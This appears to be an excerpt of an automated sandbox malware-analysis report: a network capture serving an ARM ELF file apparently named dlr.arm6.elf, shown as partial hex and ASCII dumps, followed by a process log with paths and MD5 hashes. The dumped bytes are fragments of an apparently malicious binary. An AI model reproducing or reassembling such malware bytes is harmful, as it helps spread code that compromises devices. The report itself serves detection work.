    Date: Sat, 26 Oct 2024 17:21:49 GMT
    Server: Apache/2.4.6 (CentOS)
    Last-Modified: Fri, 25 Oct 2024 07:14:52 GMT
    ETag: "15b80-62547e017ab08"
    Accept-Ranges: bytes
    Content-Length: 88960
    Connection: close
    Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 54 81 00 00 34 00 00 00 a0 59 01 00 02 00 00 04 34 00 20 00 03 00 28 00 0c 00 0b 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 a0 4d 01 00 a0 4d 01 00 05 00 00 00 00 80 00 00 01 00 00 00 a4 4d 01 00 a4 4d 02 00 a0 4d 02 00 8c 0b 00 00 3c b1 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 2c 59 02 00 00 00 00 00 a0 4d 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff 2f 11 30 00 9f e5 00 30 90 e5 00 00 53 e3 03 00 00 0a 24 30 9f e5 00 00 53 e3 0f e0 a0 11 13 ff 2f 11 04 d0 8d e2 04 e0 9d e4 1e ff 2f e1 00 00 00 00 a0 4d 02 00 30 59 02 00 ac 4d 02 00 00 00 [TRUNCATED]
    Data Ascii: ELF(T4Y4 (MMMMM<Qtd-L@-,@0S 0S/00@/,YM-@0SM88/00S$0S//M0YM ---04 1P@-@0S0SP@/@G-`p u p00PPPUG/j p@P1$ 11l0Q`0 0S0SP1 $0/HYLYO-QM@PO/!< 4,4T T Y1p0DS:`3.pg0G P`FV0@ 0V>PUG`0.X`
    Oct 26, 2024 19:21:49.581934929 CEST1236INData Raw: a0 e1 33 00 00 0a 01 30 d4 e5 08 00 57 e3 04 30 c0 e5 01 30 84 e2 2e 00 00 0a 01 40 d3 e5 09 80 47 e2 04 00 58 e1 01 10 83 e2 00 20 a0 a3 01 70 81 a2 00 a0 a0 a1 10 20 8d a5 0d 00 00 aa 24 00 00 ea 04 20 58 e0 22 00 00 0a 07 30 d4 e7 07 00 84 e0
    Data Ascii: 30W00.@GX p $ X"0 R00Bp@X-00 0 1R!00 0`K0S/VU
    Oct 26, 2024 19:21:49.581954002 CEST1236INData Raw: a0 e1 07 30 a0 e3 08 10 81 e0 00 00 96 e5 00 20 85 e5 04 30 c5 e5 01 11 a0 e1 29 2d 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 07 10 a0 e1 08 30 83 e0 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 d3 2c 00 eb 00 10 d4 e5 6c 20 9f e5 00 50 a0 e1 09 30 a0 e3
    Data Ascii: 0 0)-0 Q00 ,l P0 0-0Q A/HYLYHl<,O-,MP`p,,H
    Oct 26, 2024 19:21:49.581965923 CEST1236INData Raw: a0 e3 5d 28 00 eb 14 30 9d e5 07 00 59 e1 04 30 83 e2 14 30 8d e5 29 00 00 0a 01 48 a0 e3 01 40 44 e2 01 10 a0 e3 04 00 a0 e1 a6 2b 00 eb 08 10 9d e5 ff 20 01 e2 21 34 a0 e1 02 34 83 e1 04 20 9d e5 14 c0 9d e5 04 00 51 e1 0b 60 82 e0 0a 00 8c e7
    Data Ascii: ](0Y00)H@D+ !44 Q`0[`@U$,!$<$,0!"< 44<0,O/\@p(@W 9
    Oct 26, 2024 19:21:49.581979990 CEST908INData Raw: c6 e1 06 10 a0 e1 b4 20 d6 e1 0a 30 a0 e1 05 00 a0 e1 90 0d 00 eb 4c 30 9d e5 83 e2 a0 e1 b6 00 c6 e1 83 e1 4e e0 b2 60 d6 e1 08 e0 8e e0 b2 60 ce e1 01 39 a0 e3 10 c0 a0 e3 05 10 a0 e1 0b 00 a0 e1 09 20 a0 e1 00 e0 8d e5 04 c0 8d e5 70 27 00 eb
    Data Ascii: 0L0N``9 p'L0PL0WL0@ L0A$,,$<$,0,"< 44<00sH @D\
    Oct 26, 2024 19:21:49.582128048 CEST1236INData Raw: a0 e1 21 0c 80 e1 2e e8 a0 e1 ff 6c 06 e2 18 10 9d e5 07 54 a0 e1 24 48 a0 e1 22 ec 8e e1 23 3c 86 e1 21 4c 84 e1 25 58 a0 e1 5c 00 8d e5 54 e0 8d e5 0c 30 8d e5 50 40 8d e5 27 7c 85 e1 00 40 a0 e3 5e 0e a0 e3 04 10 a0 e3 06 00 80 e2 8b 29 00 eb
    Data Ascii: !.lT$H"#<!L%X\T0P@'|@^)$ l 21C$0A00@00 8P 04 \00/00(0U0@ e0
    Oct 26, 2024 19:21:49.582142115 CEST1236INData Raw: ff eb 05 10 a0 e1 04 20 a0 e3 40 30 a0 e3 00 b0 a0 e1 04 00 a0 e1 b3 fa ff eb 00 c0 a0 e1 ff c0 0c e2 05 10 a0 e1 05 20 a0 e3 01 30 a0 e3 04 00 a0 e1 2c c0 8d e5 ab fa ff eb 01 38 a0 e3 00 c0 a0 e1 ff c0 0c e2 01 30 43 e2 06 20 a0 e3 05 10 a0 e1
    Data Ascii: @0 0,80C 080C <p 0< 0@$0`
    Oct 26, 2024 19:21:49.582154036 CEST1236INData Raw: d1 e5 03 24 82 e1 04 2c 82 e1 30 2c 82 e0 ff 08 02 e2 22 3c a0 e1 ff 1c 02 e2 20 34 83 e1 01 34 83 e1 20 10 9d e5 02 3c 83 e1 01 00 71 e3 10 30 85 e5 aa ff ff 1a ee 0d 00 eb 01 48 a0 e3 01 40 44 e2 04 00 5b e1 0c 00 85 e5 a8 ff ff 1a e8 0d 00 eb
    Data Ascii: $,0,"< 44 <q0H@D[ 4 ?@0R080SD@T00@Q<0$dO/<< 4h
    Oct 26, 2024 19:21:49.582216978 CEST1236INData Raw: 83 e1 ff 1c 02 e2 01 34 83 e1 02 3c 83 e1 10 30 85 e5 10 30 9d e5 07 00 53 e1 b9 ff ff 1a c2 0c 00 eb 1c c0 9d e5 07 00 5c e1 b4 00 c5 e1 b7 ff ff 1a bd 0c 00 eb 20 10 9d e5 07 00 51 e1 b4 01 c5 e1 b5 ff ff 1a b8 0c 00 eb b2 00 c6 e1 b2 ff ff ea
    Data Ascii: 4<00S\ Q4O/yO-MM@P% 0,80C 4# @0
    Oct 26, 2024 19:21:49.582228899 CEST1236INData Raw: c1 e5 10 b0 81 e5 bc 31 c1 e1 01 00 84 e2 07 10 a0 e1 54 20 9d e5 6c 15 00 eb 00 00 56 e3 04 00 a0 d1 00 c0 a0 d3 0d 00 00 da 00 c0 a0 e3 04 00 a0 e1 0c 10 a0 e1 07 30 d1 e7 2e 00 53 e3 04 30 81 00 01 20 8c e2 01 10 81 e2 00 c0 c0 05 ff c0 02 12
    Data Ascii: 1T lV0.S0 Q8P XXPp0X8/0X8APE\`3D^5HP7L R9)
    Oct 26, 2024 19:21:49.587624073 CEST1236INData Raw: a0 e3 08 20 9d e5 01 0c 8d e2 b0 15 c0 e1 02 30 83 e0 14 20 d3 e5 1f 00 52 e3 10 30 93 85 54 31 8d 85 50 00 00 9a 01 38 a0 e3 01 30 43 e2 03 00 5a e1 2a 34 a0 11 ff 20 0a 12 02 34 83 11 01 0c 8d 12 b2 35 c0 11 5e 00 00 0a 15 1e 8d e2 10 20 a0 e3
    Data Ascii: 0 R0T1P80CZ*4 45^ < Y@VdP#`,@9d r)TD1S(R\T0<%^a


    System Behavior

    Start time (UTC):17:21:47
    Start date (UTC):26/10/2024
    Path:/tmp/dlr.arm6.elf
    Arguments:/tmp/dlr.arm6.elf
    File size:4956856 bytes
    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

    Start time (UTC):17:22:27
    Start date (UTC):26/10/2024
    Path:/usr/lib/systemd/systemd
    Arguments:-
    File size:1620224 bytes
    MD5 hash:9b2bec7092a40488108543f9334aab75

    Start time (UTC):17:22:27
    Start date (UTC):26/10/2024
    Path:/usr/lib/snapd/snap-failure
    Arguments:/usr/lib/snapd/snap-failure snapd
    File size:4764904 bytes
    MD5 hash:69136a7d575731ce62349f2e4d3e5c36

    Start time (UTC):17:22:28
    Start date (UTC):26/10/2024
    Path:/usr/lib/snapd/snap-failure
    Arguments:-
    File size:4764904 bytes
    MD5 hash:69136a7d575731ce62349f2e4d3e5c36

    Start time (UTC):17:22:28
    Start date (UTC):26/10/2024
    Path:/usr/bin/systemctl
    Arguments:systemctl stop snapd.socket
    File size:996584 bytes
    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

    Start time (UTC):17:22:28
    Start date (UTC):26/10/2024
    Path:/usr/lib/snapd/snap-failure
    Arguments:-
    File size:4764904 bytes
    MD5 hash:69136a7d575731ce62349f2e4d3e5c36